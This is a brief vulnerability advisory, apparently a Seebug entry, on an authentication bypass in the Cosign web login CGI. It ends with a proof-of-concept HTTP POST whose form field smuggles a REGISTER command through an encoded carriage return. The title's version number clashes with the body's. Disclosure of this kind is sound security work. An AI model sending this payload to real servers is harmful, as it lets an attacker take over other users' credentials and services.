Cosign 2.0.1/2.9.4a CGI Register Command Remote Authentication Bypass Vulnerability

ID SSV:83320
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


The 'cosign' application is prone to an authentication-bypass vulnerability because it fails to adequately sanitize user-supplied input.

An authenticated attacker can exploit this issue to access services hosted on an affected computer by assuming another user's credentials.

Versions prior to 1.9.4b and 2.0.2a are vulnerable. 

POST /cosign-bin/cosign.cgi HTTP/1.0
Cookie: cosign=X
Content-Type: application/x-www-form-urlencoded
Content-Length: N

required=& cosign=X2 username%0DREGISTER cosign=X2 cosign-servicename=Y2&login=test&password=pass&passcode=&doLogin=Log+In